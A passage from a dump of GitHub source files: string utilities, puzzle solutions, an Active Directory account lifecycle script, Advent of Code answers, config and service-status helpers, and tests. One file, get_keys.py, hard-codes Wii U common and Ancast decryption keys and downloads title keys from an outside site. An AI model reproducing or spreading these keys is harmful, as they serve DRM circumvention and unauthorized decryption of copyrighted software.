return\n\n","repo_name":"bebeh3176/Farming_sim","sub_path":"BOT_Dofus/Divers/Combat.py","file_name":"Combat.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34621481689","text":"# prompts the user for the name of a variable in camel case\ncamel_text = input(\"camelCase: \").strip()\n\n# assign the first char of the camel case\nsnake_text = camel_text[0]\n\n# check the first letter in input\nfor char in camel_text[1:]:\n # check if first letter is upper\n if char.isupper():\n # add \"_\" at the beginning of the uppercase char then make it lowercase\n snake_text += \"_\" + char.lower()\n else:\n snake_text += char.lower()\n# outputs the corresponding name in snake case.\nprint(f\"snake_case: {snake_text}\")","repo_name":"patricktenorio/CS50P_complete_course","sub_path":"week_2/camel/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"7699722188","text":"from collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \n # []\n # [1]\n # [1,2], [2,1]\n # [3,1,2], [1,3,2], [1,2,3], [3,2,1], [2,3,1], [2,1,3]\n \n res = [] # [3,2,1], [2,3,1], [2,1,3]\n que = deque([])\n que += [],\n \n for num in nums: #3\n n = len(que) # 2, [2,1] [1,2]\n for _ in range(n): # 2\n oldPerm = que.popleft() # [2,1]\n for i in range(len(oldPerm)+1): # 0,1,2\n newPerm = oldPerm[:] # [2,1]\n newPerm.insert(i, num) # \n if len(newPerm) == len(nums):\n res += newPerm,\n else:\n que += newPerm, # []\n \n return res\n\n# Second attempt\n\nfrom collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n # use bit manipulation\n # use bfs method \n \n # BFS method\n # when len == 3: add to res\n # [] -> [1] -> [2,1] [1,2] -> [3,2,1], [2,3,1], [2,1,3], [3,1,2], [1,3,2], [1,2,3]\n \n que = deque([[]])\n res = []\n idx = 0\n while len(que):\n # print(que)\n for x in range(len(que)): # 1\n temp = que.popleft() # [1]\n # print(\"temp\", temp)\n if len(temp) == len(nums):\n res += temp,\n break\n\n for i in range(len(temp)+1): # 2\n newList = temp[:i] + [nums[idx]] + temp[i:]\n # print(newList)\n que += newList,\n\n idx+=1\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27192554420","text":"import logging\nimport typing\nimport uuid\nfrom functools import lru_cache\nfrom functools import partial\nfrom functools import wraps\nfrom operator import itemgetter\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport click\nimport sentry_sdk\nfrom ra_utils.apply import apply\nfrom ra_utils.catchtime import catchtime\nfrom ra_utils.jinja_filter import create_filters\nfrom ra_utils.lazy_dict import LazyDict\nfrom ra_utils.lazy_dict import LazyEval\nfrom ra_utils.lazy_dict import LazyEvalBare\nfrom ra_utils.load_settings import load_settings\nfrom ra_utils.tqdm_wrapper import tqdm\n\nfrom .ad_exceptions import NoActiveEngagementsException\nfrom .ad_exceptions import NoPrimaryEngagementException\nfrom .ad_logger import start_logging\nfrom .ad_reader import ADParameterReader\nfrom .ad_writer import ADWriter\nfrom .read_ad_conf_settings import injected_settings\nfrom exporters.sql_export.gql_lora_cache_async import GQLLoraCache\nfrom exporters.sql_export.lora_cache import get_cache as LoraCache\nfrom exporters.sql_export.old_lora_cache import OldLoraCache\n\nlogger = logging.getLogger(\"CreateAdUsers\")\nexport_logger = logging.getLogger(\"export\")\n\nFilterFunction = Callable[[Tuple[Dict, Dict]], bool]\n\n\nclass AdLifeCycle:\n def __init__(\n self, read_from_cache: bool = True, skip_occupied_names_check: bool = False\n ) -> None:\n logger.info(\"AD Sync Started\")\n self._settings = self._load_settings()\n\n self.roots = self._settings[\"integrations.ad.write.create_user_trees\"]\n\n self.stats = self._gen_stats()\n\n self.create_filters = self._load_jinja_filters(\"create_filters\")\n self.disable_filters = self._load_jinja_filters(\"disable_filters\")\n\n self.ad_reader = self._get_adreader()\n\n # This is a potentially slow step (since it may read LoraCache)\n print(\"Retrive LoRa dump\")\n with catchtime() as t:\n self.lc, self.lc_historic = self._update_lora_cache(dry_run=read_from_cache)\n print(\"Done with LoRa caching: {}\".format(t()))\n\n # Create a set of users with engagements for faster filtering\n engagements = self.lc_historic.engagements.values()\n self.users_with_engagements = set(map(lambda eng: eng[0][\"user\"], engagements))\n\n print(\"Retrieve AD Writer name list\")\n with catchtime() as t:\n self.ad_writer = self._get_adwriter(\n lc=self.lc,\n lc_historic=self.lc_historic,\n skip_occupied_names=skip_occupied_names_check,\n all_settings=injected_settings(\"ad_lifecycle_injected_settings\"),\n )\n print(\"Done with AD Writer init: {}\".format(t()))\n\n logger.debug(\"__init__() done\")\n\n def _load_settings(self):\n return load_settings()\n\n def _load_jinja_filters(self, source: str) -> List[Callable]:\n seeded_create_filters = partial(\n create_filters, tuple_keys=(\"employee\", \"ad_object\")\n )\n setting_name = f\"integrations.ad.lifecycle.{source}\"\n filter_templates = self._settings.get(setting_name, [])\n return [\n # Decorate each `filter_func` so it will log skipped users under\n # a name such as \"create_filters_num_0\", etc.\n self.log_skipped(f\"{source}_num_{num}\")(filter_func)\n for num, filter_func in enumerate(seeded_create_filters(filter_templates))\n ]\n\n def _get_adreader(self):\n reader = ADParameterReader()\n reader.cache_all(print_progress=True)\n return reader\n\n def _get_adwriter(self, **kwargs):\n return ADWriter(**kwargs)\n\n def log_skipped(self, filtername):\n \"\"\"Return decorated version of a filter function taking a single\n `tup` arg, which is an `(employee, ad_object)` tuple.\n If the filter function returns `False`, store the result in the\n `stats[\"skipped\"][filtername]` dictionary by the employee UUID.\n \"\"\"\n\n def get_employee_name(employee):\n if \"name\" in employee:\n return \" \".join(employee[\"name\"])\n elif \"navn\" in employee:\n return employee[\"navn\"]\n else:\n return \"unknown\"\n\n def decorator(f):\n @wraps(f)\n def wrapper(tup):\n # Call the filter function saving its status\n status = f(tup)\n if status is False:\n skipped = self.stats.setdefault(\"skipped\", {})\n users = skipped.setdefault(filtername, {})\n # Add user UUID to dictionary (name is used for the value)\n employee = tup[0]\n users[employee[\"uuid\"]] = get_employee_name(employee)\n return status\n\n return wrapper\n\n return decorator\n\n def _update_lora_cache(\n self, dry_run: bool = True\n ) -> Tuple[\n typing.Union[OldLoraCache, GQLLoraCache],\n typing.Union[OldLoraCache, GQLLoraCache],\n ]:\n \"\"\"\n Read all information from AD and LoRa.\n :param dry_run: If True, LoRa dump will be read from cache.\n \"\"\"\n lc = LoraCache(resolve_dar=True, full_history=False)\n lc.populate_cache(dry_run=dry_run, skip_associations=True)\n lc.calculate_derived_unit_data()\n lc.calculate_primary_engagements()\n\n lc_historic = LoraCache(resolve_dar=True, full_history=True, skip_past=True)\n lc_historic.populate_cache(dry_run=dry_run, skip_associations=True)\n\n return lc, lc_historic\n\n def _gen_stats(self) -> Dict[str, Any]:\n return {\n \"critical_errors\": 0,\n \"engagement_not_found\": 0,\n \"created_users\": 0,\n \"disabled_users\": 0,\n \"already_in_ad\": 0,\n \"no_active_engagements\": 0,\n \"not_in_user_tree\": 0,\n \"create_filtered\": 0,\n \"users\": set(),\n }\n\n @apply\n def _find_user_unit_tree(self, user: dict, ad_object: dict) -> bool:\n try:\n (\n employment_number,\n title,\n eng_org_unit_uuid,\n eng_uuid,\n ) = self.ad_writer.datasource.find_primary_engagement(user[\"uuid\"])\n except (NoActiveEngagementsException, NoPrimaryEngagementException):\n logger.warning(\n \"Warning: Unable to find primary for {}!\".format(user[\"uuid\"])\n )\n return False\n\n logger.debug(\"Primary found, now find org unit location\")\n\n try:\n unit = self.lc.units[eng_org_unit_uuid][0]\n except KeyError:\n logger.warning(\n \"cannot find unit %r (user=%r)\", eng_org_unit_uuid, user[\"uuid\"]\n )\n return False\n\n # Walk up the organisation unit tree, starting at `unit[\"parent\"]`.\n # Stop when we find an allowed root node, or if we encounter a node\n # without a parent (must be root?)\n looking = True\n while looking:\n if unit[\"uuid\"] in self.roots:\n return True\n if unit[\"parent\"] is None:\n return False\n\n if unit[\"parent\"] in self.lc.units:\n unit = self.lc.units[unit[\"parent\"]][0]\n else:\n logger.warning(\n \"cannot find parent unit %r (user=%r)\", unit[\"parent\"], user[\"uuid\"]\n )\n looking = False\n\n return False\n\n def _get_filter_users_outside_unit_tree(self):\n \"\"\"Return predicate which filter MO users outside the specified unit tree (aka.\n \"user_trees\".)\n \"\"\"\n\n @self.log_skipped(\"filter_users_outside_unit_tree\")\n def filter_users_outside_unit_tree(tup):\n status = self._find_user_unit_tree(tup)\n if status is False:\n self.stats[\"not_in_user_tree\"] += 1\n return status\n\n return filter_users_outside_unit_tree\n\n def _gen_filtered_employees(\n self, in_filters: Optional[List[FilterFunction]] = None\n ):\n def enrich_with_ad_user(mo_employee: dict) -> Tuple[Dict, Dict]:\n \"\"\"Enrich mo_employee with AD employee dictionary.\"\"\"\n cpr = mo_employee[\"cpr\"]\n ad_object = self.ad_reader.read_user(cpr=cpr, cache_only=True)\n return mo_employee, ad_object\n\n @lru_cache(maxsize=0)\n def get_engagements() -> List[LazyDict]:\n \"\"\"Produce a list of engagements with lazily evaluated properties.\"\"\"\n\n def make_class_lazy(class_attribute: str, mo_engagement: dict) -> dict:\n \"\"\"Create a lazily evaluated class property.\"\"\"\n class_uuid = mo_engagement[class_attribute]\n mo_engagement[class_attribute + \"_uuid\"] = class_uuid\n mo_engagement[class_attribute] = LazyEvalBare(\n lambda: {\n **self.lc.classes[class_uuid],\n \"uuid\": class_uuid,\n }\n )\n return mo_engagement\n\n lc_engagements: List[\n List[Dict]\n ] = self.lc.engagements.values() # type:ignore\n engagements: Iterator[Dict] = map(itemgetter(0), lc_engagements)\n lazy_engagements: Iterator[LazyDict] = map(LazyDict, engagements)\n enriched_engagements: Iterator[LazyDict] = map(\n # Enrich engagement_type class\n partial(make_class_lazy, \"engagement_type\"),\n map(\n # Enrich primary_type class\n partial(make_class_lazy, \"primary_type\"),\n map(\n # Enrich job_function class\n partial(make_class_lazy, \"job_function\"),\n lazy_engagements,\n ),\n ),\n )\n return list(enriched_engagements)\n\n def enrich_with_engagements(mo_employee: dict) -> LazyDict:\n \"\"\"Enrich mo_employee with lazy engagement information.\n\n The list of engagements is itself lazy, so this code is essentially free\n when it is not in use.\n \"\"\"\n # Turn mo_employee into a lazy dict and add lazy properties\n lazy_employee: LazyDict = LazyDict(mo_employee)\n\n lazy_employee[\"engagements\"] = LazyEvalBare(\n lambda: list(\n filter(\n lambda engagement: engagement[\"user\"] == mo_employee[\"uuid\"],\n get_engagements(),\n )\n )\n )\n\n lazy_employee[\"primary_engagement\"] = LazyEval(\n lambda key, dictionary: next(\n filter(\n lambda engagement: engagement.get(\"primary_boolean\", False),\n dictionary[\"engagements\"],\n ),\n None,\n )\n )\n\n return lazy_employee\n\n filters: List[FilterFunction] = in_filters or []\n\n lc_employees: List[List[Dict]] = self.lc.users.values() # type:ignore\n nonempty_employees = filter(lambda val: len(val) > 0, lc_employees)\n tqdm_employees: List[List[Dict]] = tqdm(nonempty_employees)\n # From employee_effects --> employees\n employees: Iterator[Dict] = map(itemgetter(0), tqdm_employees)\n\n # Enrich with engagements\n ee_employees: Iterator[Dict] = map(enrich_with_engagements, employees)\n\n # Enrich with ad_objects\n ad_employees: Iterator[Tuple[Dict, Dict]] = map(\n enrich_with_ad_user, ee_employees\n )\n\n # Apply requested filters\n for filter_func in filters:\n ad_employees = filter(filter_func, ad_employees)\n return ad_employees\n\n def disable_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and disable non-active AD accounts.\"\"\"\n\n @apply\n def filter_user_not_in_ad(employee: dict, ad_object: dict) -> bool:\n in_ad = bool(ad_object)\n if not in_ad:\n logger.debug(\"User {} does not have an AD account\".format(employee))\n return False\n return True\n\n @apply\n def filter_user_has_engagements(employee: dict, ad_object: dict) -> bool:\n # Check the user does not have a valid engagement:\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] in self.users_with_engagements:\n logger.debug(\"User {} is active - do not touch\".format(employee))\n return False\n return True\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that does not exist in AD\n filter_user_not_in_ad,\n # Remove users that have active engagements\n filter_user_has_engagements,\n # Remove users outside the unit tree\n self._get_filter_users_outside_unit_tree(),\n ]\n + self.disable_filters\n )\n # Employees now contain only employees which should be disabled\n for employee, ad_object in employees:\n logger.debug(\"This user has no active engagemens, we should disable\")\n # This user has an AD account, but no engagements - disable\n sam = ad_object[\"SamAccountName\"]\n status = True\n message = \"dry-run\"\n if not dry_run:\n status, message = self.ad_writer.enable_user(username=sam, enable=False)\n if status:\n logger.debug(\"Disabled: {}\".format(sam))\n self.stats[\"disabled_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"enable_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n def create_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and create missing AD accounts.\"\"\"\n\n @self.log_skipped(\"filter_user_already_in_ad\")\n @apply\n def filter_user_already_in_ad(employee, ad_object):\n in_ad = bool(ad_object)\n if in_ad:\n self.stats[\"already_in_ad\"] += 1\n logger.debug(\"User {} is already in AD\".format(employee))\n return False\n return True\n\n @self.log_skipped(\"filter_user_without_engagements\")\n @apply\n def filter_user_without_engagements(employee, ad_object):\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] not in self.users_with_engagements:\n self.stats[\"no_active_engagements\"] += 1\n logger.debug(\n \"User {} has no active engagements - skip\".format(employee)\n )\n return False\n return True\n\n def run_create_filters(tup):\n status = all(create_filter(tup) for create_filter in self.create_filters)\n if status is False:\n self.stats[\"create_filtered\"] += 1\n return status\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that already exist in AD\n filter_user_already_in_ad,\n # Remove users that have no active engagements at all\n filter_user_without_engagements,\n # Check if the user is in a create-user sub-tree\n self._get_filter_users_outside_unit_tree(),\n # Run all create_filters\n run_create_filters,\n ]\n )\n # Employees now contain only employees which should be created\n for employee, ad_object in employees:\n logger.debug(\"Create account for {}\".format(employee))\n try:\n # Create user without manager to avoid risk of failing\n # if manager is not yet in AD. The manager will be attached\n # by the next round of sync.\n status = True\n message = \"dry-run\"\n status, message = self.ad_writer.create_user(\n employee[\"uuid\"], create_manager=False, dry_run=dry_run\n )\n if status:\n logger.debug(\"New username: {}\".format(message))\n self.stats[\"created_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"create_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n except NoPrimaryEngagementException:\n logger.exception(\"No engagment found!\")\n self.stats[\"engagement_not_found\"] += 1\n except Exception as e:\n logger.exception(\"Unknown error!\")\n export_logger.error(\n \"Error creating AD user for MO user %r: %r\",\n employee[\"uuid\"],\n e,\n )\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n\ndef write_stats(stats: Dict[str, Any]) -> None:\n logger.info(\"Stats: {}\".format(stats))\n stats[\"users\"] = \"Written in log file\"\n print(stats)\n\n\ndef run_preview_command_for_uuid(sync: AdLifeCycle, mo_uuid: str):\n commands = sync.ad_writer._preview_create_command(\n mo_uuid, ad_dump=None, create_manager=False\n )\n for cmd in commands:\n click.echo_via_pager(cmd)\n return commands\n\n\n@click.command()\n@click.option(\n \"--create-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Create AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--disable-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Disable AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--dry-run\",\n default=False,\n is_flag=True,\n help=\"Dry-run without changes.\",\n type=click.BOOL,\n)\n@click.option(\"--read-from-cache\", is_flag=True, envvar=\"USE_CACHED_LORACACHE\")\n@click.option(\n \"--skip-occupied-names-check\",\n default=False,\n is_flag=True,\n help=\"Skip reading all current user names from AD. Only for testing!\",\n type=click.BOOL,\n)\n@click.option(\n \"--preview-command-for-uuid\",\n help=\"Given a MO user UUID, preview the PowerShell command to be run\",\n type=click.STRING,\n)\ndef ad_life_cycle(\n create_ad_accounts: bool,\n disable_ad_accounts: bool,\n dry_run: bool,\n read_from_cache: bool,\n skip_occupied_names_check: bool,\n preview_command_for_uuid: Optional[uuid.UUID],\n) -> None:\n \"\"\"Create or disable users.\"\"\"\n logger.debug(\n \"Running ad_life_cycle with: {}\".format(\n {\n \"create_ad_accounts\": create_ad_accounts,\n \"disable_ad_accounts\": disable_ad_accounts,\n \"dry_run\": dry_run,\n \"read_from_cache\": read_from_cache,\n }\n )\n )\n\n sync = AdLifeCycle(\n read_from_cache=read_from_cache,\n skip_occupied_names_check=skip_occupied_names_check,\n )\n\n if \"crontab.SENTRY_DSN\" in sync._settings:\n sentry_sdk.init(dsn=sync._settings[\"crontab.SENTRY_DSN\"])\n\n if preview_command_for_uuid:\n run_preview_command_for_uuid(sync, str(preview_command_for_uuid))\n return\n\n if not any([create_ad_accounts, disable_ad_accounts]):\n raise click.ClickException(\n \"Either create_ad_accounts or disable_ad_accounts must be given!\"\n )\n\n if create_ad_accounts:\n stats = sync.create_ad_accounts(dry_run)\n write_stats(stats)\n\n if disable_ad_accounts:\n stats = sync.disable_ad_accounts(dry_run)\n write_stats(stats)\n\n\nif __name__ == \"__main__\":\n start_logging(export_log_file=\"AD_life_cycle.log\")\n ad_life_cycle()\n","repo_name":"OS2mo/os2mo-data-import-and-export","sub_path":"integrations/ad_integration/ad_life_cycle.py","file_name":"ad_life_cycle.py","file_ext":"py","file_size_in_byte":20093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43860690007","text":"def parse_input(input_lines):\n program = []\n for line in input_lines:\n instruction = line.split()\n if len(instruction) == 2:\n instruction[1] = int(instruction[1])\n program.append(instruction)\n return program\n\ndef simulate(program, callback):\n regValue = 1\n cycle = 0\n for instruction in program:\n cmd = instruction[0]\n if cmd == \"noop\":\n cycle += 1\n callback(cycle, regValue)\n else: #addx\n callback(cycle + 1, regValue)\n cycle += 2\n callback(cycle, regValue)\n regValue += instruction[1]\n\ndef part1(input_lines):\n program = parse_input(input_lines)\n values = []\n def callback(cycle, regValue):\n if cycle % 40 == 20:\n values.append(cycle * regValue)\n simulate(program, callback)\n return sum(values)\n\ndef part2(input_lines):\n program = parse_input(input_lines)\n image = '' \n def callback(cycle, regValue):\n nonlocal image\n horizontalPos = (cycle-1) % 40\n if horizontalPos >= regValue - 1 and horizontalPos <= regValue + 1:\n pixel = '#'\n else:\n pixel = '.'\n image += pixel\n if horizontalPos == 39:\n image += '\\n'\n simulate(program, callback)\n return image\n\nexample_image=\\\n'##..##..##..##..##..##..##..##..##..##..\\n' +\\\n'###...###...###...###...###...###...###.\\n' +\\\n'####....####....####....####....####....\\n' +\\\n'#####.....#####.....#####.....#####.....\\n' +\\\n'######......######......######......####\\n' +\\\n'#######.......#######.......#######.....\\n'\n\nexample_answers = [13140, example_image]","repo_name":"TurboErbo/AdventOfCode","sub_path":"2022/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15276373500","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @File : path.py\r\n# @Author: Zhan\r\n# @Date : 7/18/2019\r\n# @Desc : 数据、模型、字典等文件路径\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom bert import modeling\r\n\r\nfrom flyai.utils import remote_helper\r\n\r\ncPath = os.getcwd()\r\n# 训练数据的路径\r\nDATA_PATH = os.path.join(cPath, 'data', 'input')\r\n# 模型保存的路径\r\nMODEL_PATH = os.path.join(cPath, 'data', 'output', 'model')\r\n# 训练log的输出路径\r\nLOG_PATH = os.path.join(cPath, 'data', 'output', 'logs')\r\n\r\n# 必须使用该方法下载模型,然后加载\r\nBERT_PATH = os.path.dirname(remote_helper.get_remote_date(\"https://www.flyai.com/m/chinese_L-12_H-768_A-12.zip\"))\r\nBERT_PATH = os.path.join(BERT_PATH, 'chinese_L-12_H-768_A-12')\r\nprint('BERT_PATH:{}'.format(BERT_PATH))\r\n# BERT_PATH = r'D:\\jack_doc\\python_src\\flyai\\chinese_L-12_H-768_A-12'\r\nBERT_CONFIG = modeling.BertConfig.from_json_file(os.path.join(BERT_PATH,\"bert_config.json\"))\r\nBERT_CKPT = os.path.join(BERT_PATH,'bert_model.ckpt')\r\nVOCAB_FILE=os.path.join(BERT_PATH,\"vocab.txt\")\r\n\r\n\r\nTENSORFLOW_MODEL_DIR = \"dpNet.ckpt\"","repo_name":"passionzhan/flyai_contest","sub_path":"spamMessage_bert/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"3015757088","text":"# https://programmers.co.kr/learn/courses/30/lessons/42626\nimport heapq\n\ndef solution(scoville, K):\n heapq.heapify(scoville)\n count = 0\n while True:\n first = heapq.heappop(scoville)\n if len(scoville) == 0 and first < K:\n return -1\n elif first >= K:\n return count\n else:\n second = heapq.heappop(scoville)\n new = first + 2*second\n heapq.heappush(scoville, new)\n count += 1\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"heap/lv2_더맵게.py","file_name":"lv2_더맵게.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4974916366","text":"import os, sys\nimport socket\ndef getLocalIP():\n # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # s.connect(('localhost', 80))\n # print (s.getsockname())\n # s.close()\n if os.name == 'nt':\n a = socket.getaddrinfo(socket.gethostname(), None, 2, 1, 0)\n print (a)\n\n\ngetLocalIP()\nsys.exit()\n\nfrom functions_s import _PLATFORM, _ROOT_DIR, info_from_db\n\n\nprint(_PLATFORM)\nprint (_ROOT_DIR)\nprint(info_from_db(title=\"startBI\", type=\"txt\"))\nsys.exit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabsdir = os.path.dirname(os.path.abspath(sys.argv[0]))\nos.chdir(absdir)\nrootdir = os.path.dirname(absdir)\n\n\ndef getServiceSt():\n print (os.getcwd())\n if os.name == 'posix':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-fpm\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n # for line in os.popen(\"\"\" ps -ef |grep -P \"nginx|php|startBi|mysqld\" | grep -v \"grep\" \"\"\").read().splitlines():\n for line in os.popen(\"\"\" ps -ef \"\"\").read().splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n arr_rs[rs]['code'] = 1\n\n # for rs in arr_rs:\n # if arr_rs[rs]['status'] == \"running\":\n # arr_rs[rs]['path'] = os.popen(\"which %s \" %rs).read().strip()\n\n elif os.name == 'nt':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-cgi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n\n cmd_str = \"\"\"wmic process where \"name='mysqld.exe' or name='php-cgi.exe' or name='nginx.exe' or commandline='python3.exe startBI.py'\" get caption, commandline, executablePath\"\"\"\n for line in str(os.popen(cmd_str).read()).splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.lower().find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n tabs = line.split(\" \")\n arr_rs[rs]['path'] = os.path.dirname(tabs[-1])\n arr_rs[rs]['code'] = 1 if arr_rs[rs]['path'].find(rootdir) >=0 else -1\n\n return arr_rs\n\nx = getServiceSt()\n\nprint(x)\n\n# from init_db import init_db_main\n\n\n# init_db_main()","repo_name":"hanskimvz/Cosilan","sub_path":"bin/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14963179576","text":"from day7.Day7 import *\n\n\ndef test_find_possible_outer_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = find_possible_outer_bags('pale indigo bag', rules)\n\n assert result == ['shiny teal bag']\n\n\ndef test_can_contain_target__false():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'shiny olive bag', rules)\n\n assert result is False\n\n\ndef test_can_contain_target__directly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'dim olive bag', rules)\n\n assert result is True\n\n\ndef test_can_contain_target__indirectly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'pale indigo bag', rules)\n\n assert result is True\n\n\ndef test_count_contained_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = count_contained_bags('vibrant bronze bag', rules)\n\n assert result == 3 + 3 * (1 + 5 + 1)\n\n\ndef test_count_contained_bags__from_another_example():\n rules = {'shiny gold bag': [InnerBag(2, 'dark red bag')],\n 'dark red bag': [InnerBag(2, 'dark orange bag')],\n 'dark orange bag': [InnerBag(2, 'dark yellow bag')],\n 'dark yellow bag': [InnerBag(2, 'dark green bag')],\n 'dark green bag': [InnerBag(2, 'dark blue bag')],\n 'dark blue bag': [InnerBag(2, 'dark violet bag')],\n 'dark violet bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 126\n\n\ndef test_count_contained_bags__from_example():\n rules = {'shiny gold bag': [InnerBag(1, 'dark olive bag'), InnerBag(2, 'vibrant plum bag')],\n 'dark olive bag': [InnerBag(3, 'faded blue bag'), InnerBag(4, 'dotted black bag')],\n 'vibrant plum bag': [InnerBag(5, 'faded blue bag'), InnerBag(6, 'dotted black bag')],\n 'faded blue bag': [],\n 'dotted black bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 32\n","repo_name":"treegem/AdventOfCode2020","sub_path":"src/test/day7/test_day7.py","file_name":"test_day7.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36779313525","text":"#!/usr/bin/python\nfrom urllib2 import urlopen\nimport json, unicodedata\n\n\nurl='https://wiiu.titlekeys.com/json'\nresponse = urlopen(url)\nparsed = json.load(response)\nkey_file = open(\"keys.txt\",'w') \nkey_file.write(\"\"\"#Common Keys#\nD7B00402659BA2ABD2CB0DB27FA2B656 # Wii U Common Key:\n805E6285CD487DE0FAFFAA65A6985E17 # Wii U Espresso Ancast Key\nB5D8AB06ED7F6CFC529F2CE1B4EA32FD # Wii U Starbuck Ancast Key\n############################################################\n\n\"\"\")\ndata=''\nfor i in xrange(len(parsed)):\n if parsed[i]['titleKey'] == None or parsed[i]['name'] == None:\n pass\n else:\n key = parsed[i]['titleKey']\n name = parsed[i]['name']\n name = name.replace('\\n','').replace('\\t','')\n name = unicodedata.normalize('NFKD', name).encode('ascii','ignore')\n region = parsed[i]['region']\n line_data = str(key),' # ',name,' (',region,')'\n normalized_data = \"\".join(line_data)\n key_file.write(\"%s\\n\" %normalized_data)\nkey_file.close()\n","repo_name":"d0t1q/wiiu_keys","sub_path":"get_keys.py","file_name":"get_keys.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30136138028","text":"from collections import deque\nfrom sys import stdin\ndef input(): return stdin.readline().strip()\n\n\ndef read_int():\n return int(input())\n\n\ndef read_ints():\n return map(int, input().split())\n\n\nt = read_int()\nfor case_num in range(t):\n n = read_int()\n d = [list(read_ints()) for _ in range(n)]\n mem = [[] for _ in range(n + 1)]\n valid = True\n for i, (u, v) in enumerate(d):\n if u == v:\n valid = False\n break\n mem[u].append(i)\n mem[v].append(i)\n if len(mem[u]) > 2 or len(mem[v]) > 2:\n valid = False\n break\n\n if not valid:\n print('NO')\n continue\n\n vis = [False] * (n + 1)\n num = [set() for _ in range(3)]\n state = [0] * n\n\n for i in range(1, n + 1):\n if vis[i]:\n continue\n\n dq = deque()\n dq.append(i)\n\n while len(dq) > 0:\n u = dq.popleft()\n a, b = mem[u]\n if state[a] == state[b] == 